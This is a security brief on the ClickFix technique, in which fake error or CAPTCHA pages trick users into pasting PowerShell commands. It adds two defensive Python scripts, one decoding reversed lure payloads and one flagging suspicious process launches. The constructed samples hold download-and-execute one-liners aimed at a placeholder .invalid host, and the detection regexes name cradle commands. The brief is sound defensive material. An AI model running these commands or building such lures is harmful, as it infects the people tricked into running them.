Security Brief: ClickFix Social Engineering Technique Floods Threat Landscape

Summary:
Proofpoint has observed a significant rise in the use of the ClickFix social engineering technique, which tricks users into running malicious PowerShell commands themselves. First linked to campaigns by TA571 and the ClearFake threat cluster, it has since been adopted by multiple financially motivated and espionage-focused threat actors. A ClickFix lure presents a fake error message or CAPTCHA prompt that looks legitimate and tells the user to "fix" the fabricated problem by copying a command (often placed on the clipboard by the page itself) and pasting it into the Windows Run dialog or a PowerShell terminal. Once run, the command typically retrieves and launches a second-stage payload; observed families include AsyncRAT, Lumma Stealer, NetSupport RAT, and others.

Threat actors have used the technique across a wide range of impersonations, spoofing trusted brands as well as software specific to industries such as transportation and logistics. Delivery vectors include phishing emails, compromised websites, malicious URLs, HTML attachments, and fake CAPTCHA dialogs. Notable campaigns include GitHub phishing lures impersonating security notifications, German-language attacks against Swiss organizations using fake e-commerce notifications, and ChatGPT-themed malvertising that led to XWorm infections. A separate campaign attributed to the suspected espionage group UAC-0050 targeted Ukrainian organizations with phishing emails posing as document requests, using a reCAPTCHA phish to deliver malware suspected to be Lucky Volunteer.

Analyst Comments:
Recent innovations have made ClickFix even more insidious. Some campaigns now use fake CAPTCHA prompts with "Verify You Are Human" messages: the page silently copies a PowerShell command to the clipboard and presents the "verification steps" (typically open the Run dialog with Win+R, paste with Ctrl+V, press Enter) as if they were part of the check, so the user runs the command without ever reading it. One such tool, the open-source reCAPTCHA Phish toolkit, was released in September 2024 and adopted by threat actors almost immediately. Some campaigns also add evasion, such as storing the payload string reversed in the HTML file to defeat simple keyword scanning, or embedding obfuscated JavaScript padded with comments generated by language models. Although much of the activity remains unattributed, financially motivated actors dominate use of the technique, with notable espionage-focused exceptions. ClickFix is popular because it exploits human behaviour rather than a software flaw: by preying on users' desire to resolve problems on their own, adversaries get victims to infect their own systems, and because the victim rather than the attacker's code performs the download and execution, there is no malicious attachment or drive-by download for email gateways and browser protections to inspect. This shift toward psychological manipulation reflects an evolution in adversarial tactics as older delivery methods such as Office macros lose effectiveness.
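The reversed-string trick above is easy to undo once you know to look for it. The following is an added example, written for this brief and not taken from the Proofpoint report or from any campaign artifact, of a small triage script an analyst could run over a captured lure page. It assumes the reversal uses the JavaScript split/reverse/join idiom; the sample page, its placeholder command (pointing at a reserved .invalid domain) and the indicator names are all constructed for the demonstration.

```python
import re

# Constructed sample of a ClickFix-style "Verify You Are Human" lure page.
# It is not a real page: the clipboard payload is stored reversed so a naive
# scan for "powershell" finds nothing, and the command is a placeholder that
# points at a reserved .invalid domain.
SAMPLE_HTML = r'''
<div id="captcha">Verify You Are Human</div>
<ol><li>Press Win + R</li><li>Press CTRL + V</li><li>Press Enter</li></ol>
<script>
  const p = "xei|txt.x/dilavni.erul//:ptth rwi c- neddih w- llehsrewop".split("").reverse().join("");
  document.getElementById("captcha").onclick = () => navigator.clipboard.writeText(p);
</script>
'''

# A JavaScript string literal immediately followed by the split/reverse/join idiom.
REVERSED_LITERAL = re.compile(
    r'''(["'])(?P<lit>(?:\\.|(?!\1).)*)\1'''              # the quoted literal
    r'''\s*\.split\(\s*(["'])\3\s*\)'''                   # .split("")
    r'''\s*\.reverse\(\)\s*\.join\(\s*(["'])\4\s*\)'''    # .reverse().join("")
)


def recover_reversed_strings(html):
    """Return the forward form of every string literal the page reverses at run time."""
    return [m.group("lit")[::-1] for m in REVERSED_LITERAL.finditer(html)]


def lure_indicators(html):
    """Page-level indicators (names are this example's own): Run-dialog
    instructions and a clipboard write in the markup, plus whether any string
    the page reverses at run time starts with a command interpreter."""
    recovered = recover_reversed_strings(html)
    return {
        "run_dialog_instructions": bool(re.search(r"win(?:dows)?\s*\+\s*r\b", html, re.I)),
        "clipboard_write": "clipboard.writeText" in html,
        "reversed_payload_is_command": any(
            re.match(r"(?:powershell|pwsh|mshta|cmd)\b", s, re.I) for s in recovered),
    }


if __name__ == "__main__":
    for cmd in recover_reversed_strings(SAMPLE_HTML):
        print("recovered payload:", cmd)
    for name, hit in lure_indicators(SAMPLE_HTML).items():
        print(f"{name:>28}: {hit}")
```

Note that the keyword "powershell" never appears in the sample page, which is the point of the evasion; only after reversal does the payload become readable, so any static rule should run after this normalisation step rather than on the raw HTML.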

Suggested Corrections:
Given the growing adoption of ClickFix, organizations should prioritize user education. Training should teach users to recognize the tactic (fake error messages, manual PowerShell instructions, CAPTCHA "verification steps") and the simple rule that no legitimate website, CAPTCHA, or error dialog will ask them to press Win+R and paste a command. Users should report such prompts to IT or security teams rather than trying to resolve the issue themselves. Because the technique depends on the user running a pasted command, technical controls can back up the training: where users do not need it, disable the Run dialog with the "Remove Run menu from Start Menu" Group Policy (the Explorer NoRun setting), keeping in mind that this narrows only one path since lures can also direct users to a PowerShell terminal; enable PowerShell Script Block Logging (Event ID 4104) and process creation auditing with command lines (Security Event 4688 or Sysmon Event ID 1); and alert on powershell.exe, mshta.exe or cmd.exe spawned by explorer.exe with download-and-execute arguments such as a hidden window, an encoded command, or Invoke-WebRequest piped into Invoke-Expression. Understanding and addressing this threat will help organizations build stronger defenses against increasingly sophisticated social engineering attacks.
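On the telemetry side, the check a detection engineer would want is for the pasted command itself. The Run dialog is hosted by explorer.exe, so a ClickFix execution shows up as explorer.exe spawning an interpreter with a download-and-execute command line. The following is an added example, not part of the original brief or of any vendor rule, that applies that lineage-plus-command-line check to a few constructed process-creation events using Sysmon Event ID 1 field names. The events, usernames, the .invalid domain and the tell names are all made up for the demonstration; the benign events show why process lineage alone is not enough, since explorer.exe also starts everything launched from the Start menu.

```python
import json
import re

# Constructed process-creation events (Sysmon Event ID 1 field names). These
# are made-up samples, not real telemetry; the domain is a reserved .invalid
# name and the users are fictitious.
SAMPLE_EVENTS = [
    json.dumps({"EventID": 1, "User": "CORP\\alice",
                "ParentImage": r"C:\Windows\explorer.exe",
                "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                "CommandLine": "powershell -w hidden -c iwr http://lure.invalid/x.txt|iex"}),
    json.dumps({"EventID": 1, "User": "CORP\\bob",
                "ParentImage": r"C:\Windows\explorer.exe",
                "Image": r"C:\Windows\System32\mshta.exe",
                "CommandLine": "mshta http://lure.invalid/verify.hta"}),
    # Benign: user opened an interactive PowerShell from the Start menu.
    json.dumps({"EventID": 1, "User": "CORP\\carol",
                "ParentImage": r"C:\Windows\explorer.exe",
                "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                "CommandLine": "powershell.exe"}),
    # Benign for this rule: hidden window, but not launched from explorer.exe.
    json.dumps({"EventID": 1, "User": "NT AUTHORITY\\SYSTEM",
                "ParentImage": r"C:\Program Files\Vendor\agent.exe",
                "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                "CommandLine": r"powershell -w hidden -File C:\ProgramData\Vendor\deploy.ps1"}),
]

# Interpreters a pasted one-liner typically lands in.
INTERPRETERS = re.compile(r"\\(?:powershell|pwsh|mshta|cmd|wscript|cscript)\.exe$", re.I)
# Download cradles, in-memory execution, or a bare URL on the command line.
CRADLE = re.compile(
    r"\b(?:iwr|invoke-webrequest|irm|invoke-restmethod|downloadstring|curl)\b"
    r"|\b(?:iex|invoke-expression)\b|https?://", re.I)
# Flags used to hide the window, skip the profile, or pass an encoded command.
HIDDEN = re.compile(
    r"-w(?:indowstyle)?\s+h(?:idden)?\b|-nop(?:rofile)?\b|-e(?:c|nc|ncodedcommand)?\s+\S", re.I)


def triage_event(raw):
    """Return the tells matched by one JSON event; an empty list means this rule does not fire."""
    ev = json.loads(raw)
    if ev.get("EventID") != 1:
        return []
    # The Run dialog (Win+R) is hosted by explorer.exe, so a pasted ClickFix
    # command appears as explorer.exe -> interpreter. explorer.exe also starts
    # every program launched from the Start menu, so the command line must carry
    # a tell as well.
    if not ev.get("ParentImage", "").lower().endswith("\\explorer.exe"):
        return []
    if not INTERPRETERS.search(ev.get("Image", "")):
        return []
    cmd = ev.get("CommandLine", "")
    tells = []
    if CRADLE.search(cmd):
        tells.append("download_or_inmemory_exec")
    if HIDDEN.search(cmd):
        tells.append("hidden_or_encoded_flags")
    return tells


def find_clickfix_candidates(lines):
    """Return (user, interpreter, tells) for each event matching explorer.exe -> interpreter -> cradle."""
    hits = []
    for raw in lines:
        tells = triage_event(raw)
        if tells:
            ev = json.loads(raw)
            hits.append((ev["User"], ev["Image"].rsplit("\\", 1)[-1], tells))
    return hits


if __name__ == "__main__":
    for user, image, tells in find_clickfix_candidates(SAMPLE_EVENTS):
        print(f"ALERT {user}: explorer.exe -> {image} [{', '.join(tells)}]")
```

Command-line matching like this misses a payload delivered as an encoded command or assembled entirely in memory, which is why the brief recommends Script Block Logging (Event ID 4104) alongside process creation auditing: the 4104 record contains the decoded script content regardless of how it was launched, and the same cradle patterns can be applied there.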

Link(s):
https://www.proofpoint.com/us/blog/...engineering-technique-floods-threat-landscape